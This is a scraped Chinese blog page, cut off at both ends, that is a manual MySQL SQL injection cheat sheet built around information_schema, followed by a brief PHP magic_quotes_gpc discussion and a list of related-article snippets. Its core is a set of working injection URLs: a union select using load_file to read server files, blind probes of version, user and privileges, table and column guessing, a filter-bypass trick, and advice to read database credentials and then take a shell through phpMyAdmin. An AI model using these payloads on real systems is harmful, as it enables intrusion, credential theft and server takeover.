mysql information_schema 注入_mysql手工注入的详细解析和information_schema表的作用

最新推荐文章于 2023-07-16 22:58:07 发布
最新推荐文章于 2023-07-16 22:58:07 发布
阅读量126 收藏
点赞数
文章标签: mysql information_schema 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33735281/article/details/113889982
版权
本文详细探讨了SQL注入攻击的各种技术,包括利用replace函数替换特殊字符、探测数据库版本、用户权限以及利用load_file读取文件。同时,讲解了PHP环境中的安全配置,特别是magic_quotes_gpc参数对防止注入的影响,以及在该参数开启和关闭时如何防范注入攻击。通过对代码漏洞的分析,强调了PHP代码安全的重要性。
摘要由CSDN通过智能技术生成

据库名称;

TABLE_NAME表示表的名称

| COLUMNS ----―&gt存储字段名

| 关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

COLUMN_NAME表示字段名

==================================================================================

技巧:

用repalce函数将load_file结果中的 '&lt' (0x3c) 换成 ':' (0x3a)

http://www.hacked.cn/autocar/show.php?id=-42 and 1=3 union select replace(load_file(0x443a5c71696368657765625c6361725c6c6f67696e5f636865636b2e706870),0x3c,0x3a),2

当version &lt 4 ,或者搜索型注入不能用union时,下面的方法很有用

/help.php?id=3 and ord(mid(version(),1,1))&gt51/* 看版本大于3不,支不支持union

/news/display.php?id=467 and (select char_length(user()) )%3E6 and 1=1-- 看总数

/help.php?id=3 and ord(mid(user(),1,1))=114/*,返回错误,说明不是root

/help.php?id=3 and (select count(*) from mysql.user)&gt0 /* 不是root没关系,看看有没有写权限

/news/display.php?id=467 and (select ascii( substr(user(),1,1)) )%3E32 and 1=1 --一个一个猜

/news/display.php?id=467 and (select count(*) from article_admin) and 1=1--猜表名,在当前数据库中

/help.php?id=3 and (select username from movie_admin) and 1=1--猜列名

/help.php?id=3 and (select char_length(username) from movie_admin)&gt4 and 1=1--猜列长度

/help.php?id=3 and (select ascii( substr(username,1,1)) from movie_admin)%3E96 and 1=1--猜列记录

/* %3E是&gt,这样一可以绕过防注入,二可以实现猜解(当无法爆的时候,里面的函数可以换成database(),version()等) */

a.php?action=search&keyword=a%25'+and+(select+length(load_file(0xAAAAA)))&lt=32+and+1=1+and+'%25'=' /* Loadfile()

a.php?action=search&keyword=a%25'+and+(select+ascii(substr(load_file(0xAAAAA),1,1)))&lt=256+and+1=1+and+'%25'='

如果有读文件权限的话,读取mysql连接文件,获得用户名密码,然后访问/phpmyadmin/,输入密码拿shell。

======================================================================

POST表单型PHP注入

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只需将提交的变量中的所有单引号、双引号、反斜线和空字告符自动转换为含有反斜线的转义字符。如把“’”变成“\”,把“\”变成“\\”,就ok了。下面我们分为对magic_quotes_gpc=off和magic_quotes_gpc=on的注入清况分析一下。

我们先看一段有漏洞的php代码

Call 我crazy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 注入 information_schema_mysql注入information_schema数据库详解
weixin_42427302的博客
02-06 621
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL数据库可以创建多个数据库,如果把MySQL数据库比作我们中国,那么每个图书馆都可以理解为一个库,比如山大图书馆就是一个数据库,那么山大图书馆就是这个库的库名,如下图;图书馆:而在数据库中它是这样的:2、(table):可以理解为存在于库中的二级目录,接上例子:类似...
MySQL注入涉及的information_schema库讲解
雷根瓦尔德
11-19 3003
当我们在进行MySQL手工注入的时候,经常要涉及到一个库“infromation_schema”,可能有些朋友在用的时候,对这个库的操作或多或少有些理解,但是细想又不知道怎么说。大概就是知道这样做也挺明白,就是讲不出为啥????。 这篇文章不是讲MySQL注入实战,旨在讲述我们在注入时使用information_schema库主要涉及的一些,使同为新手的朋友能了解这些语句的用意和意义。我近期挖出并提交...
【网安干货】MySQL8新特性注入技巧
m0_59598029的博客
01-06 618
只能输出一个字段的内容,limit只能控制行数,select 是可以控制输出指定字段但是这里不允许,因为是 MySQL版本是 8.0.21 所以我们可以采用 table 和 小于号进行盲注,table 始终显示的所有列,我们可以注其中一个字段,这里过滤了 or 所以打算采用另一个存储数据库名和单名的视图。关键字出现的比较早,在8.0.19之后就有了,所以如果想要使用,还是先要试试这个有没有,如果 mysql 版本正好在 8.0.19-8.0.21 之间的话,就无法使用了。最后一位的比较时候就是小于(
SQL注入--information_schema注入
最新发布
arissa666的博客
07-16 409
mysql5.0版本安装之后会有自带的数据库information_schema,存储的是名和字段。上面能看到有pikachu数据库里面有users,根据名查询,获取里的字段名。思路:确定数据库,数据库名,数据库字段名,在用名字段名查询到字段值。用联合查询语句补齐注入点,能查到pikachu数据库下面有哪些名。用数据库名字在查数据库有哪些,用到tables里面的。查到的密码用cmd5解密就可以。根据字段名,查询到字段值。先确定注入点数据库名字。
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 5751
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对的自增ID进行监控,也就是说,如果某张存在自增ID,就可以通过该视图来获取其名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有的统计信息 ...
解析MySQLinformation_schema数据库
09-10
MySQLinformation_schema数据库是一个非常重要的工具,用于获取关于MySQL服务器中的元数据,即数据库、、列、索引、权限等对象的相关信息。这个数据库在MySQL 5.0版本之后被引入,它不是一个实际存在的物理...
mysql数据库中的information_schemamysql可以删除吗?
09-10
MySQL中,有若干内置的系统数据库,其中两个最为关键的数据库是`information_schema`和`mysql`。这些数据库虽然看似普通,但它们对于MySQL的正常运行至关重要,因此在任何情况下都不应该被删除。 `information_...
关于MySQL绕过授予information_schema中对象时报ERROR 1044(4200)错误
12-14
MySQL中,`information_schema`是一个特殊的数据库,它包含了所有数据库服务器中的元数据信息,比如、列、索引和权限等。用户通常可以通过查询`information_schema`来获取数据库的相关信息,例如结构、约束等...
mysql 注入 information_schema_绕过IDS过滤information_schema继续注入
weixin_35867608的博客
02-07 1162
原文:绕过IDS过滤information_schema继续注入//利用MySQL出错爆出字段mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;ERROR 1060 (42S21): Duplicate column name 'Host'mysql> SELECT * FROM (SELECT * FROM user ...
mysql information_schema 注入_03 最大的数据库 information_schema介绍以及sql注入第一题题解...
weixin_42524100的博客
02-17 154
整理人:木头第一次整理日期:2019.04.05最后整理日期:2019.05.27首先 插入个博客(csdn)//里面有具体的information_schema数据库的结构描述以及如何sql注入的简单总结直接copy过来 方便查看 //注明了出处 不算侵权吧 Ok,copy如下-------------------------------------------------------...
information_schema过滤与无列名注入
snowlyzz的博客
09-06 1285
information_schema过滤与无列名注入
mysql注入information_mysql注入information_schema数据库详解
weixin_35659005的博客
02-03 419
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL图书馆:而在数据库中它是这样的:2、(table):可以理解为存在于库中的二级目录,接上例子:类似于图书馆里的的书架,一个书架就是一个,书架上贴的分类标签就是名。书架:而在数据库中是这样的:3、列(column):列是存在于中的目录,一个中存在一个或多个列...
mysql 注入 information_schema_mysql注入information_schema数据库详解
weixin_31369469的博客
02-07 207
6.爆出2,3的位置后,尝试用内置函数读取库名等信息,这里补充下常见的内置函数。version--mysql版本user--数据库用户database--数据库名@datadir--数据库路径@@versioncompileos--操作系统继续接上,这里用在2,3的位置上查询user和库名,?id=-1 union select1,user,dabatase ,爆出了账户、登陆方式和数据库名。7....
MYSQL-INFORMATION_SCHEMA信息数据库(MYSQL注入猜解)
Quantum Intelligence
08-07 5527
MYSQL ROOT权限注入的时候需要用到的系统 ....通过以下这些就可以猜解到有那些库 有那些 有那些字段最后猜解数据....目录23.1. INFORMATION_SCHEMA 23.1.1. INFORMATION_SCHEMA SCHEMATA 23.1.2. INFORMATION_SCHEMA TABLES 23.1.3. INFORMATION_SCHEMA C
mysql手工注入详细解析information_schema作用
收集盒 Book box
11-20 2346
关于mysql手工注入详细解析information_schema作用。 基础文章, by whoami.  mysql 4.0以上支持union 4.1以上支持子查询 5.0以上有了系统 --------------------------------------------------------------------------------------
【SQL注入mysqlinformation_schema详解
weixin_33826609的博客
10-29 572
MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读。它们实际上是视图,而不是基本,因此,你将无法看到与之相关的任何文件。 0x01SCHEMATA:提供了当前mysql实例中所有数...
mysql 注入 information_schema_SQL注入information_schema的利用
weixin_32287563的博客
02-27 507
SQL注入中经常会碰到 PHP + MySQL 的情况,此时可以尝试通过 INFORMATION_SCHEMA 库来查询想要的信息。0x01 在 MySQL注入中,通常用 --+ 和 # 这两种注释符号来注释后面的语句,但是在 URL 中使用 # 会被当做 URL 的锚点不起作用,所以在使用 # 注释符时需要将其编码为 23%。0x02 通过 information_schema 数据库查询 ...
MySql注入科普
huike008的博客
06-01 164
默认存在的数据库: mysql 需要root权限读取 information_schema 在5以上的版本中存在 测试是否存在注入方法 假:示查询是错误的 (MySQL 报错/返回页面与原来不同) 真:示查询是正常的 (返回页面与原来相同) 共三种情况: 字符串类型查询时: 数字类型查询时: 登陆时: ‘ 假 ” 真 “ 假 “” 真...
SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
凡宇
07-15 286
对于mysql注入,基本上是每一名web安全从业者入门的基本功,这里不多废话,结合本人无聊时在mysql上的测试,来谈一谈mysql在过滤某些特殊字符情况下的注入,因为是想到哪写到哪,文章比较散,各位大佬请绕过,和我一样的小白可以看一看,温故而知新,必有所获。 php查询mysql的后台脚本就不搭了,没有多大意义,直接从mysql控制台开始测试。首先从最简单的开始: 直接使用mysql系统库...
mysql information_schema
06-28
这是 MySQLinformation_schema 数据库,它包含关于数据库中的所有元数据信息,包括、列和索引等。MySQL中的information_schema是一个元数据数据库,它包含有关MySQL服务器的信息。information_schema中包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值